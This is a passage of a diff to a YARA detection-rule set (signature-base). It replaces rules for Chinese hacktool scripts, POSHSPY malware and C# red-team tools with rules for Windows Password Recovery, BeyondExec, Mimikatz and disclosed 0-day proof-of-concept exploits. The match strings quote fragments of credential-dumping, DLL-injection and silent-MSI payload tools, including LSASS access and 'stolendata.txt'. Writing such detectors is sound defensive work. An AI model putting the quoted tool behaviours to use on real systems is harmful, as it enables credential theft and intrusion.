-		$s1 = "start anhao1.exe -i S.txt -p  pass1.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
-		$s2 = "start anhao2.exe -i S.txt -p  pass2.txt -o anhao.txt -l Them.txt -t 1000" fullword ascii
+		$s1 = "Time taken:" fullword ascii
+		$s2 = "Scan finished at" fullword ascii
+		$s3 = "Scan started at" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x7473 and filesize < 1KB and 1 of them
+		filesize < 20KB and 3 of them
 }
-rule SIGNATURE_BASE_Sql1433_Start : FILE
+rule SIGNATURE_BASE_WPR_Loader_EXE : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Start.bat"
+		description = "Windows Password Recovery - file loader.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "89bc249d-dba0-5196-b081-ddbd029ae6c8"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktool_scripts.yar#L127-L145"
+		id = "97fa3efb-9e7a-52ef-9e26-3fdd573d4d30"
+		date = "2017-03-15"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3463-L3483"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "bd4be10f4c3a982647b2da1a8fb2e19de34eaf01"
-		logic_hash = "b7dfc2b04e838fa3a71487287a50e183443eb62b69cd23494294f231b43baf2f"
+		logic_hash = "26af6fe1b3dfe8e3a48c03a9f6f2033fbc909a677d35159e28b7e9b867ea5542"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e7d158d27d9c14a4f15a52ee5bf8aa411b35ad510b1b93f5e163ae7819c621e2"
 
 	strings:
-		$s1 = "for /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txt" fullword ascii
-		$s2 = "start creck.bat" fullword ascii
-		$s3 = "del s1.txt" fullword ascii
-		$s4 = "del Result.txt" fullword ascii
-		$s5 = "del s.TXT" fullword ascii
-		$s6 = "mode con cols=48 lines=20" fullword ascii
+		$s1 = "Failed to get system process ID" fullword wide
+		$s2 = "gLSASS.EXE" fullword wide
+		$s3 = "WriteProcessMemory failed" fullword wide
+		$s4 = "wow64 process NOT created" fullword wide
+		$s5 = "\\ast.exe" wide
+		$s6 = "Exit code=%s, status=%d" fullword wide
+		$s7 = "VirtualProtect failed" fullword wide
+		$s8 = "nSeDebugPrivilege" fullword wide
 
 	condition:
-		filesize < 1KB and 2 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them )
 }
-rule SIGNATURE_BASE_POSHSPY_Malware
+rule SIGNATURE_BASE_WPR_Loader_DLL : FILE
 {
 	meta:
-		description = "Detects"
+		description = "Windows Password Recovery - file loader64.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7e908efc-0023-5be1-9871-8bfbf8b9e53a"
-		date = "2017-07-15"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_poshspy.yar#L11-L28"
+		id = "d3102ab6-0473-544b-b9dd-ec7a18ae1c4b"
+		date = "2017-03-15"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3485-L3518"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1f8b502950d2f7600041b5492f529682b9f5f2863c36ad40618b5ed78a94567"
+		logic_hash = "015334828007e954d1e910e6377b37bade99df2ce86152901ec4ded8c71975de"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "7b074cb99d45fc258e0324759ee970467e0f325e5d72c0b046c4142edc6776f6"
+		hash2 = "a1f27f7fd0e03601a11b66d17cfacb202eacf34f94de3c4e9d9d39ea8d1a2612"
 
 	strings:
-		$x1 = "function sWP($cN, $pN, $aK, $aI)" fullword ascii
-		$x2 = "$aeK = [byte[]] (0x69, 0x87, 0x0b, 0xf2" ascii
-		$x3 = "(('variant', 'excretions', 'accumulators', 'winslow', 'whistleable', 'len',"
-		$x4 = "$cPairKey = \"BwIAAACkAABSU0EyAAQAAAEAA"
-		$x5 = "$exeRes = exePldRoutine"
-		$x6 = "ZgB1AG4AYwB0AGkAbwBuACAAcAB1AHIAZgBDAHIA"
+		$x1 = "loader64.dll" fullword ascii
+		$x2 = "loader.dll" fullword ascii
+		$s1 = "TUlDUk9TT0ZUX0FVVEhFTlRJQ0FUSU9OX1BBQ0tBR0VfVjFfMA==" fullword ascii
+		$s2 = "UmVtb3RlRGVza3RvcEhlbHBBc3Npc3RhbnRBY2NvdW50" fullword ascii
+		$s3 = "U2FtSVJldHJpZXZlUHJpbWFyeUNyZWRlbnRpYWxz" fullword ascii
+		$s4 = "VFM6SW50ZXJuZXRDb25uZWN0b3JQc3dk" fullword ascii
+		$s5 = "TCRVRUFjdG9yQWx0Q3JlZFByaXZhdGVLZXk=" fullword ascii
+		$s6 = "YXNwbmV0X1dQX1BBU1NXT1JE" fullword ascii
+		$s7 = "TCRBTk1fQ1JFREVOVElBTFM=" fullword ascii
+		$s8 = "RGVmYXVsdFBhc3N3b3Jk" fullword ascii
+		$op0 = { 48 8b cd e8 e0 e8 ff ff 48 89 07 48 85 c0 74 72 }
+		$op1 = { e8 ba 23 00 00 33 c9 ff 15 3e 82 }
+		$op2 = { 48 83 c4 28 e9 bc 55 ff ff 48 8d 0d 4d a7 00 00 }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or ( 1 of ( $s* ) and all of ( $op* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Csharpsetthreadcontext : FILE
+rule SIGNATURE_BASE_WPR_Passscape_Loader : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "883bb859-d5ab-501d-8c83-0c5a2cf1f6c8"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/djhohnstein/CSharpSetThreadContext"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L6-L20"
+		description = "Windows Password Recovery - file ast.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d8e224ce-edd2-5e2d-9b6e-a8995f5d2c1c"
+		date = "2017-03-15"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3520-L3538"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1fab70ce4bb1a00d8e8155ce7d859aa2f8d193dd40378a8fff0fdfb1c94f9a76"
+		logic_hash = "79b1a3ed1ea0d9a3ddee0b8557393318a8baf4812110a6ed03a7106b8096b31e"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f6f2d4b9f19f9311ec419f05224a1c17cf2449f2027cb7738294479eea56e9cb"
 
 	strings:
-		$typelibguid0lo = "a1e28c8c-b3bd-44de-85b9-8aa7c18a714d" ascii wide
-		$typelibguid1lo = "87c5970e-0c77-4182-afe2-3fe96f785ebb" ascii wide
+		$s1 = "SYSTEM\\CurrentControlSet\\Services\\PasscapeLoader64" fullword wide
+		$s2 = "ast64.dll" fullword ascii
+		$s3 = "\\loader64.exe" wide
+		$s4 = "Passcape 64-bit Loader Service" fullword wide
+		$s5 = "PasscapeLoader64" fullword wide
+		$s6 = "ast64 {msg1GkjN7Sh8sg2Al7ker63f}" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 2 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_DLL_Injection : FILE
+rule SIGNATURE_BASE_WPR_Asterisk_Hook_Library : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "aec4fc28-9aa2-5eef-9fb1-d187a83a72b3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/ihack4falafel/DLL-Injection"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L22-L35"
+		description = "Windows Password Recovery - file ast64.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "03c20c9d-bb8f-53f6-9cb5-9b059fb24949"
+		date = "2017-03-15"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3540-L3562"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a9ad0c7a68602214cf31d9b065b9b2c5f7eb616bcec0f3428e958c0f762282b2"
+		logic_hash = "6bb75cb8c3ba18a34f4651532060154608c78e6f748148226da4416ad1171124"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "225071140e170a46da0e57ce51f0838f4be00c8f14e9922c6123bee4dffde743"
+		hash2 = "95ec84dc709af990073495082d30309c42d175c40bd65cad267e6f103852a02d"
 
 	strings:
-		$typelibguid0lo = "3d7e1433-f81a-428a-934f-7cc7fcf1149d" ascii wide
+		$s1 = "ast64.dll" fullword ascii
+		$s2 = "ast.dll" fullword wide
+		$s3 = "c:\\%s.lvc" fullword ascii
+		$s4 = "c:\\%d.lvc" fullword ascii
+		$s5 = "Asterisk Hook Library" fullword wide
+		$s6 = "?Ast_StartRd64@@YAXXZ" fullword ascii
+		$s7 = "Global\\{1374821A-281B-9AF4-%04X-12345678901234}" fullword ascii
+		$s8 = "2004-2013 Passcape Software" fullword wide
+		$s9 = "Global\\Passcape#6712%04X" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Limeusb_Csharp : FILE
+rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "dfa96b36-e84c-510b-b16b-bd686777b83d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/LimeUSB-Csharp"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L37-L50"
+		description = "Windows Password Recovery - file wpr.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7fa2062c-75dd-55aa-8775-631a9c1a497e"
+		date = "2017-03-15"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3564-L3593"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd5b12c43046e56ebef78104fd7a9389476686bd4adca4964fc8b559432ae236"
+		logic_hash = "0f2995a8ba1644d384167221560aa0c3f074e8e2cf2b79bbb06537fcaed2df7f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c1c64cba5c8e14a1ab8e9dd28828d036581584e66ed111455d6b4737fb807783"
 
 	strings:
-		$typelibguid0lo = "94ea43ab-7878-4048-a64e-2b21b3b4366d" ascii wide
+		$x1 = "UuPipe" fullword ascii
+		$x2 = "dbadllgl" fullword ascii
+		$x3 = "UkVHSVNUUlkgTU9O" fullword ascii
+		$x4 = "RklMRSBNT05JVE9SIC0gU1l" fullword ascii
+		$s1 = "WPR.exe" fullword wide
+		$s2 = "Windows Password Recovery" fullword wide
+		$op0 = { 5f df 27 17 89 }
+		$op1 = { 5f 00 00 f2 e5 cb 97 }
+		$op2 = { e8 ed 00 f0 cc e4 00 a0 17 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 20000KB and ( 1 of ( $x* ) or all of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Ladon : FILE
+rule SIGNATURE_BASE_WPR_Windowspasswordrecovery_EXE_64 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "57e3d2fa-d430-561b-9d42-cf58cda5ed7a"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/k8gege/Ladon"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L52-L65"
+		description = "Windows Password Recovery - file ast64.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0f6c7695-e616-5757-b9cd-8cff5f972c3e"
+		date = "2017-03-15"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3595-L3612"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1a2c6d3bb2964847aaff4828bbd7b75301e287bcff3f27324bc7767c0f73820f"
+		logic_hash = "6cdd46609d401b7c12b936de7f64bab0bc45b9d2c6079fae45a96f5be6857b82"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4e1ea81443b34248c092b35708b9a19e43a1ecbdefe4b5180d347a6c8638d055"
 
 	strings:
-		$typelibguid0lo = "c335405f-5df2-4c7d-9b53-d65adfbed412" ascii wide
+		$s1 = "%B %d %Y  -  %H:%M:%S" fullword wide
+		$op0 = { 48 8d 8c 24 50 22 00 00 e8 bf eb ff ff 4c 8b c7 }
+		$op1 = { ff 15 16 25 01 00 f7 d8 1b }
+		$op2 = { e8 c2 26 00 00 83 20 00 83 c8 ff 48 8b 5c 24 30 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Whitelistevasion : FILE
+rule SIGNATURE_BASE_Beyondexec_Remoteaccess_Tool : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cd2740d0-0315-5a32-b34a-1998024fcc06"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/khr0x40sh/WhiteListEvasion"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L67-L80"
+		description = "Detects BeyondExec Remote Access Tool - file rexesvr.exe"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd68cb45-a46f-53d7-bf52-8f7bd3636d0d"
+		date = "2017-03-17"
+		modified = "2025-12-18"
+		reference = "https://goo.gl/BvYurS"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3623-L3641"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "38838b45c3c7359e49f890f5f7608e5a6026421e83b0ef7371c8558c571395a6"
+		logic_hash = "6f21ddf04ab0d29549c3d07a45afb3e7648a15b0c81f88b8d7ccccc436ba4084"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "3d3e3f0708479d951ab72fa04ac63acc7e5a75a5723eb690b34301580747032c"
 
 	strings:
-		$typelibguid0lo = "858386df-4656-4a1e-94b7-47f6aa555658" ascii wide
+		$x1 = "\\BeyondExecV2\\Server\\Release\\Pipes.pdb" ascii
+		$x2 = "\\\\.\\pipe\\beyondexec%d-stdin" fullword ascii
+		$x3 = "Failed to create dispatch pipe. Do you have another instance running?" fullword ascii
+		$op1 = { 83 e9 04 72 0c 83 e0 03 03 c8 ff 24 85 80 6f 40 }
+		$op2 = { 6a 40 33 c0 59 bf e0 d8 40 00 f3 ab 8d 0c 52 c1 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) or all of ( $op* ) ) ) or ( 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Lime_Downloader : FILE
+rule SIGNATURE_BASE_Mimikatz_Gen_Strings : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "bfb0f97c-6d95-5e11-ad11-5297bcf7c3df"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/NYAN-x-CAT/Lime-Downloader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L82-L95"
+		description = "Detects Mimikatz by using some special strings"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3f4ab5d7-5a9f-55f0-9dda-e2975df582a0"
+		date = "2017-06-19"
+		modified = "2025-12-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3643-L3665"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8086f6be648bcb5535b98aafc5fd898dc975273eec3c19a54263f74bb7c0f629"
+		logic_hash = "371e74538a63cfe355ebd31e1ac73cd25e92f3a7ce3f9299e0f3406f2bcb5b01"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "058cc8b3e4e4055f3be460332a62eb4cbef41e3a7832aceb8119fd99fea771c4"
+		hash2 = "eefd4c038afa0e80cf6521c69644e286df08c0883f94245902383f50feac0f85"
+		hash3 = "f35b589c1cc1c98c4c4a5123fd217bdf0d987c00d2561992cbfb94bd75920159"
 
 	strings:
-		$typelibguid0lo = "ec7afd4c-fbc4-47c1-99aa-6ebb05094173" ascii wide
+		$s1 = "[*] '%s' service already started" fullword wide
+		$s2 = "** Security Callback! **" fullword wide
+		$s3 = "Try to export a software CA to a crypto (virtual)hardware" fullword wide
+		$s4 = "enterpriseadmin" fullword wide
+		$s5 = "Ask debug privilege" fullword wide
+		$s6 = "Injected =)" fullword wide
+		$s7 = "** SAM ACCOUNT **" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 12000KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Darkeye : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Lpe : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "5dc6702f-a398-5be2-9df8-9a2ddc636a1f"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/K1ngSoul/DarkEye"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L97-L110"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d3693d1d-6085-5e62-8f0b-dde5b14758b7"
+		date = "2017-07-07"
+		modified = "2025-12-18"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3677-L3698"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7571ed93fd3ea690549ab35682b0073e1c2b9ac57e36394d35794aba7c50b79e"
+		logic_hash = "77d72792d7fcf2c54b36d124448e928f306981296715e583d346ccd101e22fc7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "e10ee278f4c86d6ee1bd93a7ed71d4d59c0279381b00eb6153aedfb3a679c0b5"
+		hash2 = "a5916cefa0f50622a30c800e7f21df481d7a3e1e12083fef734296a22714d088"
+		hash3 = "5b701a5b5bbef7027711071cef2755e57984bfdff569fe99efec14a552d8ee43"
 
 	strings:
-		$typelibguid0lo = "0bdb9c65-14ed-4205-ab0c-ea2151866a7f" ascii wide
+		$x1 = "msiexec /f c:\\users\\%username%\\downloads\\" ascii
+		$x2 = "c:\\users\\%username%\\downloads\\bat.bat" fullword ascii
+		$x3 = "\\payload.msi /quiet" ascii
+		$x4 = "\\payload2\\WindowsTrustedRTProxy.sys" wide
+		$x5 = "\\payload2" wide
+		$x6 = "\\payload" wide
+		$x7 = "WindowsTrustedRTProxy.sys /grant:r administrators:RX" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 70KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpkatz : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Exploit : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ff084b4c-4b00-5504-85ee-d6d17b5be504"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/b4rtik/SharpKatz"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L112-L125"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "72b8aafd-d79a-5812-90fd-5d5aca109254"
+		date = "2017-07-07"
+		modified = "2025-12-18"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3700-L3714"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8899192a8006bb31ce4277fc371a30b301ffc1a42030ca3a4059a2b53c889bae"
+		logic_hash = "12a7a04fdc621242f42107204996e44b1962b5ac5eef4f9b9cbbe0ad52b85676"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "632d35a0bac27c9b2f3f485d43ebba818089cf72b3b8c4d2e87ce735b2e67d7e"
 
 	strings:
-		$typelibguid0lo = "8568b4c1-2940-4f6c-bf4e-4383ef268be9" ascii wide
+		$x1 = "\\Release\\exploit.pdb" ascii
+		$x2 = "\\favorites\\stolendata.txt" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Externalc2 : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injectdll : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "1bbdfbb9-a3e8-5ffe-9db9-b50937e6a14d"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/ryhanson/ExternalC2"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L127-L141"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "90a4dca0-4f12-5946-9d5d-0b93bb5a3c5d"
+		date = "2017-07-07"
+		modified = "2022-12-21"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3716-L3734"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "81042972411ab82da8460f9e263614f563bc67e3ce585f1a955b565b066ee8c9"
+		logic_hash = "b0a9bd4fa2d8a1192258b303cb757c8bbce7f6962a1d895f57add8a1c3887799"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "173d3f78c9269f44d069afbd04a692f5ae42d5fdc9f44f074599ec91e8a29aa2"
 
 	strings:
-		$typelibguid0lo = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii wide
-		$typelibguid1lo = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii wide
+		$x1 = "\\Release\\InjectDll.pdb" ascii
+		$x2 = "Specify -l to list all IE processes running in the current session" fullword ascii
+		$x3 = "Usage: InjectDll -l|pid PathToDll" fullword ascii
+		$x4 = "Injecting DLL: %ls into PID: %d" fullword ascii
+		$x5 = "Error adjusting privilege %d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Povlsomware : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Payload_MSI : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "0eba43d2-b415-5e72-9677-4a3238ff7c34"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/povlteksttv/Povlsomware"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L143-L156"
+		description = "Detects POC code from disclosed 0day hacktool set"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fe32af56-d5a1-5246-a7df-395b9cd02faf"
+		date = "2017-07-07"
+		modified = "2022-12-21"
+		reference = "Disclosed 0day Repos"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-hacktools.yar#L3736-L3752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f8e246080ffcaa73ad727d2d9a1f2b75f2d413b49dff0c3b50831a41e1f14a2f"
+		logic_hash = "7dfc8d2bd871ad6acb7d362a946d34ed1830f42ab625c3d3d9cb512f28ccdb57"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a7c498a95850e186b7749a96004a98598f45faac2de9b93354ac93e627508a87"
 
 	strings:
-		$typelibguid0lo = "fe0d5aa7-538f-42f6-9ece-b141560f7781" ascii wide
+		$s1 = "WShell32.dll" fullword wide
+		$s2 = "Target empty, so account name translation begins on the local system." fullword wide
+		$s3 = "\\custact\\x86\\AICustAct.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Runshellcode : FILE
+rule SIGNATURE_BASE_Disclosed_0Day_Pocs_Injector : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
